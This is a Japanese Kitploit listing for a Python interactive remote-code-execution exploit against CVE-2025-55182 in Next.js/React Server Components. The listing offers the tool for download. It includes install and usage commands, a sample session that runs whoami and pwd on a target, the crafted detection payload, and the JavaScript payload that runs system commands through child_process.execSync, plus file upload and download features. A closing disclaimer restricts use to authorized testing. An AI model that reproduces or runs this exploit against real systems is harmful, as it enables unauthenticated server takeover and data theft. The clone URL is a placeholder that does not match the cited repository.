Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-55182-shellinteractive — Next.js/React Server Componentsの逆シリアル化の脆弱性を標的としたCVE-2025-55182用の対話型RCEエクスプロイト。自動検出、コマンド実行、ファイル転送、履歴とオートコンプリートを備えた組み込みシェルを特徴としています。 | Kitploit
ツール/GitHubGitHub/mrr0b0t19/cve-2025-55182-shellinteractive
ペイロード生成脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテストコマンド&コントロールリモートアクセスツール
GitHubmrr0b0t19/cve-2025-55182-shellinteractive

CVE-2025-55182-shellinteractive

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Next.js/React Server Componentsの逆シリアル化の脆弱性を標的としたCVE-2025-55182用の対話型RCEエクスプロイト。自動検出、コマンド実行、ファイル転送、履歴とオートコンプリートを備えた組み込みシェルを特徴としています。

リポジトリを見る
2139ヶ月前Kitploit レビュー済み

CVE-2025-55182-shellinteractive

使用元: https://github.com/Emiyelbarto/CVE-2025-55182-PoC 素晴らしい貢献に心から感謝します。

概要

CVE-2025-55182 は、Next.js/React Server Components における逆シリアル化の脆弱性であり、認証されていないリモート攻撃者が影響を受けるサーバー上で任意のコードを実行できるようにします。この脆弱性は、React Server Actions におけるシリアル化データの不適切な処理に起因します。

主な機能:

  • ✅ コマンド履歴とオートコンプリートを備えた対話型シェル
  • ✅ 自動脆弱性検出
  • ✅ リモートコマンド実行
  • ✅ ファイルのアップロード/ダウンロード機能
  • ✅ 組み込みテストスイート
  • ✅ 設定可能なターゲットパラメータ

インストール

前提条件

  • Python 3.8 以上
  • requests ライブラリ

クイックセットアップ

root@kitploit:~
# Clone the repository
git clone https://github.com/yourusername/hokma.git
cd hokma

# Install dependencies
pip install requests

# Make script executable (optional)
chmod +x hokma.py

使用方法

基本的な使い方

root@kitploit:~
# Start interactive shell
python hokma.py

# Check vulnerability only
python hokma.py -u http://target.com --check

# Execute single command
python hokma.py -u http://target.com -c "whoami"

対話型シェルコマンド

root@kitploit:~
help                    Show this help message
set URL <url>          Set target URL
set ID <action_id>     Set action ID (default: user-profile-action)
show                   Show current options
check [url]            Check if target is vulnerable
exploit <command>      Execute command on target
shell                  Start interactive command shell
test                   Run test commands (id, whoami, etc.)
upload <loc> <rem>     Upload local file to target
download <rem> <loc>   Download remote file (base64 encoded)
clear                  Clear screen
exit/quit              Exit the shell

実行例

root@kitploit:~
$ python hokma.py

  ____                 _     ____  _          _ _ 
 |  _ \ ___  __ _  ___| |_  / ___|| |__   ___| | |
 | |_) / _ \/ _` |/ __| __| \___ \| '_ \ / _ \ | |
 |  _ <  __/ (_| | (__| |_   ___) | | | |  __/ | |
 |_| \_\___|\__,_|\___|\__| |____/|_| |_|\___|_|_|
                                                  
 React Server Components RCE Exploit (CVE-2025-55182)
Interactive Shell - Type 'help' for commands

hokma> set URL http://vulnerable-app.com
[+] URL set to: http://vulnerable-app.com

hokma> check
[*] Checking vulnerability on target: http://vulnerable-app.com...
[+] TARGET IS VULNERABLE!

hokma> exploit whoami
[*] Executing command: whoami
[*] Server responded with status: 200

--- COMMAND OUTPUT ---
www-data
----------------------

hokma> shell
[*] Starting reverse shell. Use 'exit' to return.
[*] Enter commands to execute on target:
cmd> pwd
[*] Executing command: pwd

--- COMMAND OUTPUT ---
/var/www/html
----------------------
cmd> exit

設定オプション

オプションデフォルト説明
ターゲットURLなし脆弱なアプリケーションのURL
アクションIDuser-profile-action対象とするサーバーアクションID
タイムアウト3秒リクエストタイムアウト

技術詳細

脆弱性の検出

このツールは、脆弱なシステムでクラッシュを引き起こす特別に細工されたマルチパートリクエストを送信します:

  • 空のオブジェクト {} を持つペイロード ["$1:a:a"] を使用
  • HTTP 500 レスポンスまたは特定のエラーパターンを通じて脆弱性を検出

悪用の仕組み

  1. JavaScriptペイロードの構築: Function コンストラクタを使用してNode.jsスクリプトを作成します
  2. 子プロセスの実行: child_process.execSync() を使用してシステムコマンドを実行します
  3. レスポンスの抽出: コマンド出力をキャプチャして表示します

ペイロード構造

root@kitploit:~
const cmd = "COMMAND";
return import('child_process').then(cp => {
    try {
        const output = cp.execSync(cmd).toString();
        return output;
    } catch(e) { 
        return "Command Execution Failed: " + e.message; 
    }
});

倫理的な使用と免責事項

重要な法的通知

このツールは以下を目的としています:

  • 許可されたセキュリティテスト
  • 教育目的
  • 適切な同意を得た脆弱性研究

所有していないシステム、またはテストする明示的な許可を得ていないシステムに対してこのツールを使用しないでください。コンピュータシステムへの不正アクセスは違法かつ非倫理的です。

開発者はこのツールの誤用について一切の責任を負いません。ユーザーは適用されるすべての法律を遵守し、テスト前に適切な許可を取得する必要があります。

既知の制限事項

  1. ターゲットの要件:

    • React Server Components を備えたNode.jsサーバー
    • CVE-2025-55182 に対して脆弱であること
    • 子プロセスモジュールが利用可能であること
  2. 検出の制限:

    • 誤検知/見逃しが発生する可能性があります
    • 特定のエラーレスポンスに依存します
  3. 悪用の制約:

    • コマンドはサーバープロセスの権限で実行されます
    • 出力が一部切り詰められる場合があります
    • 複雑なコマンドには特別なエスケープが必要な場合があります
ツールをダウンロード